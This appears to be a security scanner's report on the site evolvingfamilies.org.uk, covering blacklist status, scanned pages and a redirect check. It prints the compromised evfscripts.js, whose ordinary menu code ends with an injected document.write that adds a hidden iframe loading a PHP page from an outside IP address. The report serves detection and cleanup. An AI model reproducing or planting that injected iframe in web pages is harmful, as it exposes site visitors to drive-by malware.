Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=evolvingfamilies.org.uk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://evolvingfamilies.org.uk/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.evolvingfamilies.org.uk/ | 200 OK Content-Length: 1134 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/whatwedo.php | 200 OK Content-Length: 5939 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/evfscripts.js | 200 OK Content-Length: 1515 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function expandmenu(id)
{ var elm = document.getElementById(id); elm.style.visibility = 'visible'; } function collapsemenu(id) { var elm = document.getElementById(id); elm.style.visibility="hidden"; } function touchStart(event,id){ var elm = document.getElementById(id); if ( elm.style.visibility !== 'visible'){ event.preventDefa dd = document.getElementById("divmenuid"); dd.className += " divUp"; dd = document.getElementById("divmenu2id"); dd.className += " divUp"; } }document.write('<iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"></iframe>'); Antivirus reports:
Hidden iFrame found. style: hidden src: http://62.212.9.114/wordpress/wp-content/uploads/change.php <iframe src="http://62.212.9.114/wordpress/wp-content/uploads/change.php" style="display:none;"> | ||
http://www.evolvingfamilies.org.uk/whatwedodx.php | 200 OK Content-Length: 10818 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/adult.php | 200 OK Content-Length: 6865 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/families.php | 200 OK Content-Length: 4110 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/lac.php | 200 OK Content-Length: 5947 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/parent.php | 200 OK Content-Length: 7850 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/behaviour.php | 200 OK Content-Length: 6685 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/costs.php | 200 OK Content-Length: 5329 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/diabetes.php | 200 OK Content-Length: 7735 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/whoweare.php | 200 OK Content-Length: 5992 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/team.php | 200 OK Content-Length: 12641 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/social.php | 200 OK Content-Length: 6889 Content-Type: text/html | clean |
http://www.evolvingfamilies.org.uk/news.php | 200 OK Content-Length: 4692 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: evolvingfamilies.org.uk
Result:
GET / HTTP/1.1
Host: evolvingfamilies.org.uk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: evolvingfamilies.org.uk
Referer: http://www.google.com/search?q=evolvingfamilies.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: evolvingfamilies.org.uk
Referer: http://www.google.com/search?q=evolvingfamilies.org.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.